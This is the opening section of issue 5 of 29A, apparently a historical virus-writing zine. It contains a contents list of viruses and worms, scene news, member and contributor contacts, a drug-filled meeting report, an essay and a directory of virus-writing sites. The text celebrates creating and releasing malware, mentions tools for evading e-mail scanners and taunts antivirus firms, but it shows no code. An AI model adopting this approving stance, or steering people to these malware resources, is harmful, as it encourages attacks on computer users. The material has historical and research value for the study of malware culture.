Professional Documents
Culture Documents

Introduction                         VirusBuster/29A
News                                 VirusBuster/29A
Contributors                         VirusBuster/29A
Membership                           VirusBuster/29A
Distribution                         VirusBuster/29A
Our greetings                        29A staff
Policies and goals                   Darkman/29A
Secret area                          VirusBuster/29A
About the viewer                     VirusBuster/29A
VX meeting in Brno 2000              Benny/29A
A Bucket Of Letters                  Lord Julus/29A
Reference guide to VX sites          VirusBuster/29A
Generally about VX scene             Benny/29A

Articles:

Utilities:

Windows 95 / 98 / ME:
DarkMillennium                       Clau
Repus                                Super/29A
HenZe                                HenKy
Noise                                Bumblebee/29A
Espore                               HenKy
Putita                               HenKy
Estukista                            HenKy
Sentinel                             f0re
SVK                                  Tcp/29A

Windows NT / 2000:
WinNT/Adonai                         HenKy
Win2K/Stream                         Benny/29A & Ratter

Win32 viruses:
Linux/LoTeK                          Wintermute
Linux/Zipworm!                       Vecna
I-Worm/Energy                        Benny/29A
I-Worm/Chainsaw                      T-2000/Immortal Riot
I-Worm/Icecubes                      f0re
I-Worm/Troodon                       Clau
I-Worm/XTC                           Benny/29A
HLP/Ayuda                            Bumblebee/29A
Macro/Furio                          The WalruS
Macro/Karma                          The WalruS
Macro/One                            jackie
PHP/Pirus                            MaskBits/VXI
CMD/r0bin-&-m4rian                   Nemo
DOS/ACG disasm                       Super/29A
Introduction
──────────────────────────────────────────────────────────────────────────────
Old-timers in the VX scene could not believe it when they heard the 29A group
was releasing its 5th issue in December, just 9 months after the 4th issue.
We could say we met our goal of releasing 29A magazine within a year, as we
promised in this same section of the last issue.
In this new release we make a new promise: 29A will try not to release
issues as huge as the 4th one again, or at least not because of MP3 files.
Anyway, it is the 29A group that decides what gets released, and it is each
reader's decision whether the zine deserves the download or not.
From here, we would like to thank very much all the contributors to 29A #5,
both those whose work got published and those who sent us material that we
did not publish. It is through the efforts of 29A members, and also of
contributors, that 29A gets quality releases, and that is why we in 29A must
be grateful to them. We are also grateful to VaW for his intro for the zine.
Darkman, Lethal Mind, Reptile and Sopinky left 29A due to their inactivity
in the group, Bumblebee and Prizzy left due to personal problems, and
Mandragore joined 29A. Regards and best wishes to the ex-members.
Please note: 29A issue 5 has to be extracted with Long File Name (LFN)
support.
29Aers hope readers enjoy this new production from the 29A group, and also
that antivirus companies enjoy detecting and removing the viruses released
in our zine; we wish ex-AVP more luck than last time in disinfecting GriYo's
CTX or detecting Bumblebee's 99 ways to die.
News
──────────────────────────────────────────────────────────────────────────────
Back in April...
HenKy left the Matrix group and virus writing, returning to the scene later.
Anaktos joined Matrix and the group released its first issue.
A new virus group named Silicium Revolte was formed. They disappeared within
a few months and never released anything. Is this group disbanded? Any
information for the news section of 29A #6 would be appreciated.
Back in May...
The annual VX meeting was scheduled for 1st August somewhere in the Czech
Republic, the exact location being unknown.
Variants of the ILoveYou virus were still appearing all around the world, the
coder of the original virus being unknown.
Back in June...
B0z0 left the IKX group. The charismatic guy who used to be the leader of the
group left IKX and the scene, with StarZer0 taking over responsibility inside
the group.
Back in July...
Pascal Virus Team was formed. Time showed that PVT cannot really be called a
group.
The SMF group released DVL issue 10. Duke, leader of SMF, did another good job
with this release.
SMF reported that SST, a Russian virus coder, was being investigated for
"Creating, distribution and usage of harmful computer programs", according to
the Russian criminal code. SST is currently still releasing viruses.
AntiState Tortoise released the very first virus for AutoCAD 2000.
The Kefrens group disbanded and one of the members released a posthumous
issue 1.
Evul, coderz.net owner and virus coder, had a car crash but fortunately was
not badly hurt.
The Linezer0 Network 2K group released its second issue. Black Jack left the
group and got a reply from his ex-group to the reasons he gave for quitting.
Back in August...
The Feathered Serpents group announced their very first issue after some
years of activity (bad tongues would say inactivity). After a while DrOwl
announced the release had been cancelled, which surprised nobody in the
scene.
The annual VX meeting took place in Brno (.cz), but it was not very
successful. GriYo and GigaByte were the only VXers from outside the "zone"
who attended. This situation should spark a debate between people who think
meetings should be held in a different place every year and people who think
they should be held where the number of attendees would be large. More
information about the meeting can be found in this zine in an article
written by Benny.
Lucky 2000, also known under other nicks, a famous code ripper, left the
scene.
Back in September...
Renegade, leader of the ASM group, released DIE #2. The first release of the
zine contained a backdoor, which was fixed in a later release. Because of the
backdoor incident Renegade left the scene.
Benny/29A and Ratter released the first virus for the Win2K platform, named
"Stream".
Back in October...
Jackie Qwerty, ex-29A member, announced that he had become the father of a
girl.
Another VX meeting took place in Valencia, Spain. Being a "local" meet, it
was more successful than the international one. Well-known VXers such as
Billy Belcebu, The Mental Driller, Tcp, Super, Bumblebee and some others were
there.
Evul had to close Matrix's site on Coderz due to the impact of the Matrix
virus all over the world.
Nick FitzGerald confirmed what some people were already thinking: the tests
performed by VTC (Hamburg) are corrupted.
Back in November...
The ILoveYou virus made the Guinness Book of Records as the most widespread
virus ever.
A new virus channel named #vxers was created because of disagreements between
many VXers and the guys (Darkman, Evul, Knowdeth, Roadkil) running the #virus
channel.
AVP announced they were going to change the name of their product from AVP
to Kaspersky Anti-Virus. It seems the AVP people wanted to end their business
relationship with Central Command, the American distributor of AVP, and to do
that they had to change the name.
A new group named Mions was created, formed by Worf and Mimi as virus
collectors and Radix16 as virus coder.
This month...
MaskBits released the first PHP virus and later left the scene.
Contributors
──────────────────────────────────────────────────────────────────────────────
If you want to contribute to the next issue of 29A magazine, please mail us
at: darknode@oninet.es.
We'd like to thank GriYo/29A for the viewer, VaW for the intro and T-2000
for tips and ideas for the zine.
Furthermore, we'd like to thank all the people who have contributed to this
issue of 29A for all the help and effort they put into it. The list of
contributors and what they contributed is as follows:
Handle                                        Contribution(s)
──────────────────────────────────────────────────────────────────────────
Black Jack                                    Demiurg
Black_Jack_VX@hotmail.com
www.coderz.net/blackjack

Clau                                          DarkMillennium
clau@ultimatechaos.org                        Troodon
www.walrus.8k.com/

Doxtor L.                                     Idele
<no e-mail>
<no url>

f0re                                          Sentinel
f0revir@hotmail.com                           Icecubes
http://f0re.cjb.net

HenKy                                         Adonai
henky_@LatinMail.com                          HenZe
members.es.tripod.de/lakasazul/henky.htm      Espore
                                              Putita
                                              Estukista

MaskBits                                      Pirus
vxindia@shadowvx.com
www.vxi.cjb.net

Nemo                                          r0bin-&-m4rian
Nemo@deepzone.org
www.deepzone.org

T-2000                                        Chainsaw
T2000_@hotmail.com                            Win32 386+ Random-Number-In-Range
                                              Generator
www.immortalriot.cjb.net                      MIME/UUENCODE attachment encoders
                                              SMTP client
                                              Encrypted ZIP files to evade
                                              e-mail gateway scanners

Vecna                                         ZipWorm!
vecna@antisocial.com                          Muazzin SDK
<no url>

Wintermute                                    LoTek
wintermute@mad.servicom.es
personal5.iddeo.es/wintrmute/indice.htm

ZeMacroKiller98                               LaraCroft
zebulon@softel.fr
http://www.crosswinds.net/~zemacrokiller98/index.htm

|Zan                                          H0rtiga
izan@deepzone.org
www.deepzone.org
Membership
──────────────────────────────────────────────────────────────────────────────
If you think you have the profile we're searching for, please mail us a
little about yourself, your interests, which viruses you have coded so far,
etc. to: darknode@oninet.es.
If you want to mail 29A as a group, i.e. every 29A member, please mail us
at the above e-mail address too.
The list of the current members, their origin and e-mail addresses is as
follows:
Most of our members have a homepage of their own, where you can find more
information about them, their viruses, current projects, etc. Their URLs are
as follows:

Handle            URL
────────────────────────────────────────────────
Benny             http://benny29a.cjb.net
GriYo             http://www.bi0.net
Lord Julus        http://lordjulus.cjb.net
Mandragore        http://www.multimania.com/mdrg
VirusBuster       http://vtc.cjb.net
Distribution
──────────────────────────────────────────────────────────────────────────────
If you think you should be in the previous list and you are not, fuck you!
And for all the guys/girls/things from #virus, nice and not so nice:
greetings ppl!
To all members of 29A, IKX, Matrix and all the people from #virus a great
greeting and all the best!!!
Virii related
-------------
Benny: Psychedelic drugs are bad... but love marijuana!! :)
Billy Belcebú: At the next meetup I'm going to bring a cybercafé security guard XD
Bumblebee: Writing a fat poly is just a matter of getting down to it (a lot, but getting down to it :)
Darkman: Come back to the VX!
GriYo: Let's see if we do a joint poly :P =)
Lord Julus: Let's do a meta compo! :P (Joke. Very difficult! :)
Mental Driller: Errhm... :)
Mister Sandman: Good thing you didn't swap me for a broom ;))
nigr0: That Nigrogay thing, uhmm... we'll have to kill Super XDDD
Super: See you soon :P
Tcp: Seeya soon! ;)
Vecna: Keep coding! Your viruses are among the best!
VirusBuster: Those huge logs are going to get my account pulled XD
Wintermute: So now you're switching to the penguin? :)
YbY: Don't hang around with Billy, he's gay and into hackers XDD
Zaxon: Hey, where are you that nobody sees you?
Anti-greetz
-----------
Fascism, Metallica
──────────────────────────────────────────────────[VirusBuster's greetings]───
I'd like to greet the people forming the 29A, IKX and Matrix groups and the
following people in particular: b0z0, Buddy Music, CyberYoda, Daniel,
Del_Armg0, Duke, Evul, foxz, Int13h, Jack Qwerty, Jackie, Leugim San, mgl,
Mist, Mr Sandman, Newton, Nigr0, Paddingx, PaX, Perikles, Raid, Rajaat,
Renegade, Reptile, SnakeMan, Secret, Somnium, Sopinky, Spanska, SSR, T-2000,
Urgo, Vecna, Vein, VicodinES, Wintermute, Worf, Ypsilon, Z0MBiE and Zulu.
Policies and goals
──────────────────────────────────────────────────────────────────────────────
That's why you'll occasionally see a virus from 29A in the wild or carrying
a destructive payload, even though we do our very best to keep the number of
incidents down to a minimum.
Destructive payloads and the spreading of viruses are the reason why people
get in trouble, the reason why people like The Black Baron got arrested,
prosecuted, sentenced and finally jailed.
We code viruses for the fun of it, because it's our hobby, not because we
want to harm other people or to get ourselves into trouble.
Our goal is to create new, unique, interesting viruses and virus utilities
and to release 29A magazine on a regular and more frequent basis. Releasing
the magazine frequently has been a problem for us; we are getting better,
but it is still something we need to work on.
We cannot and will not be held responsible for whatever you (the reader)
decide to do with the contents of the 29A magazines, nor can the group be
held responsible for the actions of any individual members.
Secret area
──────────────────────────────────────────────────────────────────────────────
Passwords for 29A magazine issues 1 and 2 can be found in the "Secret area"
article in 29A magazine issue 3.
The password for 29A magazine issue 4 is "29A 2000". You must type the
numbers using the keys on the right side of the keyboard (don't forget to
enable Num Lock).
About the viewer
──────────────────────────────────────────────────────────────────────────────
There are no parameters or commands available for this viewer; it is
designed to be used with a mouse.
Before the meeting
──────────────────

There was a big discussion before the meeting happened. Where should the
meeting be? Moscow, said someone, and that was the final word. But becoz
almost everyone who agreed with that said that he can't come, Darkman and I
decided to make the meeting in my city Brno in the Czech Republic.

First reactions were better than I expected. Many ppl wanted to come, they
were about 20+. I sent to everyone who asked me about the meeting a mail
where the program, accommodation, local prices etc. were explained... but
something went wrong. Darkman, Lord Julus, and many Spanish coderz and
memberz of 29A couldn't come becoz of problems with money and/or lack of
time. The rest didn't answer me in two months, so I thought they can't or
don't want to come.

I reserved rooms in a hotel for all foreign ppl and gave them the address of
a not mentioned pub, that was supposed to work as our own headquarterz :)

Ppl from the Czech Republic promised me to call me when they will be able to
come.

The meeting started at the 31st of July 2000, at 12:00 CET.

Ppl that were officially on the meeting:

- Benny/29A (Benny es typicamento Chec :)
- GigaByte (the only one female coder, alcoholic and pothead :)
- GriYo/29A (say weeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeed :)
- Maia (aka Odyssey)
- Ratter
- Skag (small hacker, big human)
- Mort/MATRiX
- Alko
- Axe
- Prizzy/29A (He doesn't spread viruses, but knowledge ;)
- Igi ( http://www.viry.cz )

Start of the meeting
────────────────────

The first day I was waiting for GigaByte and Skag. GigaByte arrived at 2
o'clock with her grandfather. All the day I was drinking beerz in the pub
and when Skag (he is one hacker, living in Brno) arrived, I was already
pretty drunk. We, GigaByte, Skag and me, started to drink more and more.
GigaByte got drunk from two small beerz and one Becherovka. After we left
the pub, we decided to teach GigaByte to smoke weed :) Unfortunately,
GigaByte didn't get stoned, becoz I hadn't enough weed :/ We went to one
disco (called Relax), where we had some tequilas. GigaByte got totally drunk
from two Vodka+Redbull. Heh, she told me that in Belgium it's a very
favourite combination. I also had one Vodka with Redbull, but I wasn't
drunk. But the next morning, I felt really pretty bad. I had totally red
eyes and it took me some time to start to walk :). Fuck Giga, with Vodka and
Redbull you are drunk only the next day or what?! :P Hehehe...

We also didn't forget that day to talk about viruses and hang on IRC in a
cybercafe :)

The famous 2nd day
──────────────────

2nd day we waited for GriYo, Maia (GriYo's gf), Ratter, Mort and Axe.
Ratter arrived in the morning, Mort and Axe later. GriYo told me that he
will arrive to Prague and asked me if I could find someone to get him from
Prague to Brno. I couldn't find anyone, so I told GriYo to take a taxi.
Finally, my father found someone, but it was already late to say it to
GriYo. GriYo didn't know that I will wait for him in the airport in Prague.
Unfortunately, the airplane was late, meanwhile another airplane from Spain
arrived. GriYo wasn't there. I waited there for one and a half hours, then I
decided to ask one lady from the airport if she could ask in reproductorz
all airport staff and ppl for a guy called "GriYo". Hehehe, she was
astonished when I said that I'm looking for "GriYo", without any surname :))
No one with the "GriYo" handle was found, so I decided to leave. I was
pretty angry, becoz I spent about 90 USDs for the travel and I didn't find
GriYo.

While I was in Prague, Ratter and GigaByte went to the cybercafe. They gave
the first infos about the meeting to *-zine guys, so they could inform other
ppl on their website. Axe and Mort also arrived. They were all waiting for
me in the pub.

I arrived back to the pub in the evening, ofcoz without GriYo. I saw
GigaByte, Axe and Mort sitting silently in a pub (Ratter left while I was on
the way to Brno). Hehehe, GigaByte is very gewd in english speaking, as
opposed to Axe and Mort, and those guys were afraid of Giga :). I told them
that the art of speaking in english is to NOT show that you don't understand
and look like you do :). They replied me: "Heh, well, and what do you think
that we did all the time you were outta here, eh?" X-DDDD

Axe decided to leave, so I was alone with Mort and GigaByte. I didn't know
what to do. Perhaps wait until the pub will close, and then go home... we
were joking that GriYo tried to smuggle some weed and now he is in jail. I
told him that if there will be any problem or change, to call me. And he
didn't. On the other hand, ppl in jail can use the telephone only once, and
it's not possible that he would call ME (not a lawyer) and say that he won't
come to the meeting, hehe... :DDD And at that time the receptionist called
the pub and said that in the hotel there are some "strange" ppl talking in
Spanish. Fuck!!! Finally!!!
I went to the hotel and shouted: "Oh my g0d, GriYo, Maia, where da fuck you
were?!" They looked at me like I was mad :) It was a really gewd feeling to
know that they are OK.

We went to the pub, had a dinner, some beerz and some TYPICAL CZECH DRINKS
(hello Maia :), such as Becherovka. Giga got drunk again, becoz she mixed it
with beerz and Whiskey :)

GriYo and Maia were a bit tired from the travel (and Giga from drinking :),
so they went to sleep soon. I was drinking on and on, and now I can't
remember how I got home. Maybe by taxi? :)

3rd day - the party time
────────────────────────

That morning it was really hard. I had a pretty huge hangover (I slept only
for 4 hours) and I had to wake up very early becoz Prizzy and Alko should
arrive. When we met each other, we went to the pub to have some beers.
Ratter also arrived at that time. Giga woke up with a hangover too and she
couldn't understand how we can drink 2,5 litres of beer for breakfast :)
GriYo and Maia were OK.

We decided to take some photos of one of the most famous AV companies in the
Czech Republic - Grisoft (c) Software. It was really funny, becoz any minute
some AV freak could see us and beat us :) Fortunately no one saw us... now,
almost everyone has photo(s) with some "weird" guys/girlz in front of the AV
building :))

Then we went to one very famous pub in Brno. Everybody drank some ( = many
:) beerz. We left after some hours to smoke some weed. GriYo again proved
himself as a very gewd guy and gave us his joint from hash that he smuggled
from Spain. The hash was from Morocco, and it was a bit strong, and so some
ppl got stoned immediately. Then we visited some other pubs. In one pub
there weren't any ashtrays... you can imagine how the pub looked after one
hour, eh? X-D

We visited the cybercafe (meanwhile Skag arrived at the meeting). I and
GigaByte were sitting at one computer. There was a pretty funny discussion
on IRC. GigaByte: "Benny is st0ned" GigaByte: "GigaByte is drunk from one
beer" GigaByte: "I am NOT" GigaByte: "She is" GigaByte: "I AM NOT" GigaByte:
"SHE IS!" And becoz we were on IRC only under Giga's nickname (so no one
could know that there are two ppl), someone replied: "Hey GigaByte, I can
see the meeting is pretty hard for yer brain, eh? You are getting
schizophrenic" :))

After that we decided to go to the park and smoke again. Prizzy and Axe
couldn't watch us smoking ourselves to death and so they went home. Prizzy
didn't return.

Then we went to one restaurant where AVerz usually eat. GriYo had pretty
much overeaten. We went to one university club (to put some alcohol into our
blood :), GriYo showed us on his notebook his projects (AV program, Sniffer,
IRC client, RDA engine, and many other interesting programs) and after that
we decided to go to sleep. GriYo had a full stomach and he needed to go to
the toilets. The nearest toilets were about 100 metres from our place. GriYo
said "NO, I can't wait anymore", ran to the nearest building and "dropped a
shit" there. Hehehe, the building was the army academy! After that we wanted
to piss on the Grisoft building, but there were many ppl near that. Heh,
nevertheless, I think it was a really gewd target. The army academy in Brno
in the Czech Republic was infected by GriYo's polymorphic stealth
direct-infection one-day-resident shit!!! :))

Another goal was that GigaByte got STONED for the FIRST time in her life.
Congrats Giga, keep working on yourself! :)

4th day - the st0ned day
────────────────────────

Next morning - next huge hangover. This day we were walking thru the city.
We visited churches, many pubs, a crypt (we saw preserved corpses :),
teashops (our favourite place, there we could smoke some very good and
strong tobacco from a waterpipe) and so on. GigaByte, well known non-smoking
VXer (:-) also smoked. In the evening we went to our favourite park to smoke
something. I won the contest "who will smoke more hash". Well, as Giga said,
I looked like a vampire becoz of my veeeeeeeeeery red eyes :) Many ppl
couldn't walk and talk becoz of that great amount of hash, including me >D.

5th day - GriYosoft action
──────────────────────────

The previous day, after we consumed many beerz and weed, we wanted to show
Grisoft (Czech AV company) and everybody our presence at the meeting in
Brno. We wanted to make something famous on our meeting. We wanted to create
some poster about the meeting and distribute it all around Brno. We decided
to write on A4 paper "GriYosoft, Vx meeting Brno 2000", have every visitor
of the meeting sign it and distribute about 40 copies. At the Grisoft
building we placed 2 copies and made some photos of that :) We did the same
at the Czech Television building, a high-school, some computer shops and the
railway station, really :)))
After that we went to a pool club to celebrate :) I was drunk from the 15
beerz I drank all the day and GigaByte from vodka+redbull again :) When we
were totally drunk, Gigabyte showed us the source code of the Scrambler
virus. Heh, GriYo and I started a discussion with Giga on the theme "what
could be done better", "what could be more optimized" and "why is ASM better
than HLLs". Although Giga could not talk becoz of the alcohol in her blood,
GriYo and I started to teach her assembler. Wow, Gigabyte, HLL coder,
started to understand assembler :) Also, good stuff is that she remembers
something from that :)

6th day - The last day
──────────────────────

In the morning Igi (one Czech guy, he has a webpage about viruses and
antiviruses, news etc - http://www.viry.cz) arrived. Again we visited
teashops, pubs and some parks, where we used to smoke. That was also the
last day. Everybody was very tired from that non-stop drinking and smoking.
Our stomachs were burned by alcohol and pillows by dust from joints and
pipes :) In the night, we visited one pool club... we played pool and drank
more and more. Becoz everybody was tired and becoz GriYo, Maia and Giga had
to wake up early, we decided to go to sleep. The meeting was at its end. On
my way home I and Skag stuck some GriYosoft posters in the city... nice end
of meeting :P

What happened then?
───────────────────

What happened then? I also had to wake up early, becoz I went with GriYo and
Maia to Prague to the airport. Also GigaByte, although she was leaving in
the afternoon, wanted to see us for the last time. GriYo and Maia went to
Amsterdam, where the next meeting was (it was the 6th of August). I also
went to Amsterdam, on the 9th of August. I stayed there at Rajaat's house.
On the 10th of August, when I arrived in Amsterdam (together with my
friend), I had the meeting with GriYo and Maia in one coffeeshop near the
bus station. We smoked a lot, finally, again in Amsterdam, in the most
beautiful city in the world. Unfortunately, we didn't meet anymore, becoz of
my mobile phone, that crap (heh, when I arrived back to .cz, the 2nd day
some gypsy stole it from me :/).
At Rajaat's house we smoked about 20 joints per day, and also ate magic
mushrooms. That was a really very nice time.
Well, from the 31st of July to the 17th of August, I had the best time of my
life.

Final words
───────────

When I was writing this article, I forgot many details of the meeting.
Perhaps I forgot to write about one day, perhaps I wrote about a
non-existing day (becoz of drugs and my fantasy :), perhaps it happened on
other days than I wrote. Perhaps nothing happened and it was only a dream.
However, it was a really nice dream. Thnx my friends!
────────────────────────[ "A Bucket Of Letters" ]─────────────────────────
─────[ (featuring passages from "War of the Worlds" by George Wells) ]──────
[──────────────────────────────────────────────────────────────────────────]
"No one would have believed, in the last years of the nineteenth
century, that human affairs were being watched from the timeless
worlds of space. No one could have dreamed we were being
scrutinized, as someone with a microscope studies creatures that
swarm and multiply in a drop of water. Few men even considered the
possibility of life on other planets and yet, across the gulf of
space, minds immeasurably superior to ours regarded this Earth
with envious eyes, and slowly and surely, they drew their plans
against us."
I would like to ask all of you: do you feel in charge of your own
life? Do you feel that you are the Master of your own self? Do you think
that your life is something that you control and that shall never escape
your grip? Do you feel this? Then, you are either no more than 18 years old
or you are the President of the United States (even here there could be some
problems). Let me tell you, guys, what the few priorities people have in
their life are, and I will explain in a second how all this crap I write
links to viruses and 29A. So, the priorities are as follows:
1. family
2. job
3. hobbies
This is as shortly as one could put it. Family always comes first:
this is because you are born into your family, then you choose your family
when you get married and furthermore you make your own family when you have
kids. So for something that is as much random as non-random, it must be in
first place. Job, of course, comes second, because job means money, means
social protection, means development. And by means of your job you are able
to support your first priority, family, and your third priority, the hobbies.
In last place come your own hobbies. It is more than obvious why: the job
takes most of your time, family gets the rest of the free time and only a
small, small part of what is still free is left for your own hobbies... Did
you notice that? Did you notice that even IF you consider that the family and
the job are the most important things for you, you feel the biggest
frustration whenever you are not able to fulfill the least important one:
the hobbies... But this is very logical! People are individuals! Individuals
have personality! Personality leads to an unconscious desire of fulfilling
your OWN dreams, your OWN pleasures, your OWN hobbies...
"And that's how it was for the next ten nights. A flare, spurting
out from Mars - bright green, drawing a green mist behind it - a
beautiful, but somehow disturbing sight. Ogilvy, the astronomer,
assured me we were in no danger. He was convinced there could be no
living thing on that remote, forbidding planet."
You will not believe me, but it's the truth: as I was writing this
article my mother burst into the room kicking and screaming that I don't
let her read some email message from my sister and I am just "playing" on
the computer... See what I mean? THEY are always more important... It
doesn't even matter that it's my computer! It doesn't even matter that it's
my e-mail address... All that matters is for "THEM" to achieve their goals...
Life is shit!
"A few young men crept closer to the pit. A tall funnel rose, then
an invisible ray of heat leapt from man to man and there was a
bright glare, as each was instantly turned to fire. Every tree and
bush became a mass of flames at the touch of this savage,
unearthly Heat Ray. When the smoke cleared, the little steamer had
reached the misty horizon, and Carrie was safe. But the Thunder
Child had vanished forever, taking with her man's last hope of
victory. The leaden sky was lit by green flashes, cylinder following
cylinder, and no one and nothing was left now to fight them. The
Earth belonged to the Martians."
What is most annoying is that you will always feel incapable of
doing anything about it... I think that children should be told when they
are born: hey, kiddo! It's not long until you will not be able to desire
anything, so ask for everything now while you still can! But, of course,
where would the fun of discovering life be? Some say that idiots learn by
themselves and smart people learn from others. Well, personally I think
that it's a combination of the two... Somewhere in the middle...
"That evening, there was a violent crash and I realized with horror
that my home was now within range of the Martian's Heat Ray. At
dawn, a falling star with a trail of green mist landed with a flash
like summer lightning. This was the second cylinder.[...]
Never before in the history of the world had such a mass of human
beings moved and suffered together. This was no disciplined march -
it was a stampede - without order and without a goal, six million
people unarmed and unprovisioned, driving headlong. It was the
beginning of the rout of civilization, of the massacre of mankind."
So, after this surely boring dissertation let me tell you why I
feel this way... Briefly, this is what I wanted to release in the new issue
of 29A: a metamorphic engine, a polymorphic engine, a compression engine,
three viruses and at least 4 articles. I had started all of them as follows:
1. Engines
   a. Metamorphozis
   b. Modularis
   c. Lord Julus's Lev-Zimpel Compression Engine
2. Viruses
   a. Win32.Rammstein
   b. Win32.Guyana
   c. Win32.SSS (SunSet Superman)
3. Articles
   a. Compression part II
   b. Metamorphism
   c. Backdoors
   d. Local network infection
   e. Using errors under win32
4. Utilities
   a. BeholdPE
I am quite sure that my friends in the 29A Group, all of them great
guys, felt that I kinda drifted away from the group as my messages always
came late, there were fewer of them, my contributions didn't come in time...
Anyway, I have to thank all of them for being so patient and I hope that this
article explains most of these things...
"A fifth Machine appeared on the far bank. It raised itself to full
height, flourished the funnel high in the air - and the ghostly,
terrible Heat Ray struck the town. As it struck, all five Fighting
Machines exulted, emitting deafening howls which roared like
thunder. [...] With a white flash, the Heat Ray swept across the
river. Scalded, half-blinded and agonized, I staggered through
leaping, hissing water towards the shore. I fell helplessly, in full
sight of the Martians, expecting nothing but death."
What can one expect to fulfill his desires other than a miracle? No, don't
laugh! It's a reality... Nowadays, you need a miracle to allow you to
fulfill your dreams... Ok, you might think: look at this pathetic guy... his
dreams are a poly engine and some articles... Yes! So WHAT?!? Who the fuck
cares what my dreams are?!? My dreams are MY DREAMS and I want to fulfill
them... If I wanted to raise ants I would raise ants... If I wanted to build
a pyramid I would dedicate my whole life to that desire!!! It's human
nature, people! We want to do what we like to do! It is how we are built!
"I looked up and saw a third machine. It was erect and motionless,
like the others. An insane resolve possessed me I would give my life
to the Martians, here and now. I marched recklessly towards the
Titan and saw that a multitude of black birds was circling and
clustering about the hood. I began running along the road. I felt no
fear, only a wild, trembling exultation, as I ran up the hill
towards, the motionless monster. Out of the hood hung red shreds, at
which the hungry birds now pecked and tore. I scrambled up to the
crest of Primrose Hill, and the Martian's camp was below me. A
mighty space it was, and scattered about it, in their overturned
machines, were the Martians - dead... slain, after all man's devices
had failed, by the humblest things upon the Earth, Bacteria. Minute,
invisible, bacteria!"
I hope you did not get TOO bored by this long and tear-filled
article... But this is the mood I am in and this is what I transmit to
you... I hope also that you had the time to read the passages from "The War
of the Worlds". It shows you how such a proud species as humankind can be
defeated in a few seconds if it is not careful enough... It also shows how
it can find escape through something that people always considered an enemy...
It proves that no matter how much you think things through, no matter how long
you make your plans, there will always be something that will tear up your
plans... And still, there will always be hope that somewhere, sometime,
when you least expect it something will arise and help you out... Maybe even
something that you considered harmful...
So, here I am, hoping that someday I will be able to fulfill all of
my dreams!
These were the words from Lord Julus... Stay well, everybody!!!
┌─────────────────────────┐
│    Lord Julus / 29A     │█
└─────────────────────────┘█
 ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
Reference guide to VX sites
by VirusBuster/29A
Virus coders
------------
BeLiAL: http://home.foni.net/~belial/
Benny: http://benny29a.cjb.net
Bhunji: http://home.swipnet.se/bhunji/
Bumblebee: http://www.bbbee.cjb.net
CyberShadow: http://www.coderz.net/ABS/
Darkman: http://www.coderz.net/darkman
Del_Armg0: http://www.delly.fr.st/
Eddow: http://members.xoom.com/Eddow/index.html
Evul: http://www.coderz.net/evul
f0re: http://f0re.cjb.net/
FRiZER: http://frizer.tsx.org
GigaByte: http://www.coderz.net/gigabyte
GriYo: http://www.bi0.net
Knowdeth: http://www.coderz.net/metaphase/knowdeth/
LiFEwiRE: http://www.coderz.net/lifewire/
Mandragore: http://www.multimania.com/mdrg/
Nigromant: http://www.fortunecity.com/skyscraper/ethernet/94/neurotic.htm
nucleii: http://www.coderz.net/nucleii
Paddingx: http://paddingx.cjb.net/
Prizzy: http://prizzy.cjb.net/
Psyclone X: http://macros.gq.nu/
Radix16: http://www.volny.cz/radix16/
Raid: http://www.coderz.net/Raid
Rajaat: http://www.shadowvx.com/rajaat
R-E-V: http://www.coderz.net/rev/
SMOOTHiE: http://SMOOTHiE.gq.nu/
Snakebyte: http://www.coderz.net/Snakebyte
Toro: http://www.shadowvx.com/toro/
Ultras: http://www.coderz.net/ultras
VxFaeRie: http://www.coderz.net/vxf
Wintermute: http://personal5.iddeo.es/wintrmute/indice.htm
Yello: http://www.yello.8k.com/
ZeMacroKiller98: http://www.crosswinds.net/~zemacrokiller98/index.htm
Z0MBiE: http://z0mbie.cjb.net/
Virus Collectors
----------------
Algol: http://www.geocities.com/algol_p/
Apoc: http://aappoocc.virtualave.net
BaidareW: http://www.free-hosting.lt/virii/
ByteSurgeon: http://www.geocities.com/ByteSurgeon/
Cyphonix: http://www.geocities.com/cyphonix/
Daniel: http://www.coderz.net/daniel
HomeSlice: http://www.coderz.net/homeslice
Newton: http://www.coderz.net/newton/
PastolVX: http://www.coderz.net/pastolvx
Perikles: http://jupiter.spaceports.com/~perikles
Phage: http://www.shadowvx.com/phage/
Quilb: http://logs.quilb.net/
raenius: http://www.shadowvx.com/raenius
RDX_: http://www.coderz.net/RDX_/
Roadkil: http://www.coderz.net/Roadkil/
Specter: http://www.shadowvx.com/specter/
Sph1nx: http://sph1nx.cjb.net/
Staggle: http://www.shadowvx.com/staggle/
Tally: http://www.coderz.net/tally/
VEiN: http://home.wirefire.com/nathan/
Virax: http://welcome.to/Virax
VirusBuster: http://vtc.cjb.net
VirusP: http://www.shadowvx.com/virusp/
vxcod3: http://www.shadowvx.com/vxcod3
Worf: http://moon.zlin.vutbr.cz/~mimi/frame.html
Zordhak: http://www.coderz.net/zordhak/
VX Groups
---------
* (Asterix): http://virus.cyberspace.sk/
29A: http://www.coderz.net/29A
astigmatiZm: http://astigmatizm.cjb.net/
IKX: http://www.ikx4ever.org
MATRiX: http://www.coderz.net/matrix/
4Q: http://shadowvx.com/4Q
Alta-Virus: http://altavirus.cjb.net/
Chili: http://www.crosswinds.net/~chili/
darkbyte: http://www.darkbyte1.cjb.net/
GeneCode: http://members.xoom.com/genecode/cgi/
Mist: http://www.misttsim.org/
PhreakX: http://www.vxnews.8m.com/
Recoder: http://www.halyava.ru/recoder
Slumdung: http://biocd.cjb.net/
Spyda: http://www.coderz.net/spyda/
VX Heavens: http://vx.netlux.org/
VX India: http://www.vxi.cjb.net/
VX News: http://www.coderz.net/vxnews/
Final note:
If your site is not listed and you would like it to be present in the next
29A issue, send an email to darknode@oninet.es informing us about your site.
┌──────────────────────────────────────┐
│       Generally about VX scene       │
│ (from the psychedelic point of view) │
└──────────────────────────────────────┘
┌────────────────────┐
│    by Benny/29A    │
└────────────────────┘
┌───────────────┐
│ Thanx goez to │
└───────────────┘
Timothy Leary, The Beat generation, Skag and the whole sixties yearz for giving me
inspiration about the sense of life. Thank god for all the psychedelic drugz he
gave us...
┌─────────────┐
│ Fux goez to │
└─────────────┘
Idiotic human beingz that can't understand that they are NOT the center of
the universe. To the ppl that keep their mind closed and absolutely don't
want to accept other'z opinionz and basic rightz. If you want to stay dumb
for the rest of your life then continue, do it! But don't touch my right - to
do whatever I want to do with myself - even with my brain, which you can NOT
and will NOT ever control... Fuck you!
┌───────┐
│ Intro │
└───────┘
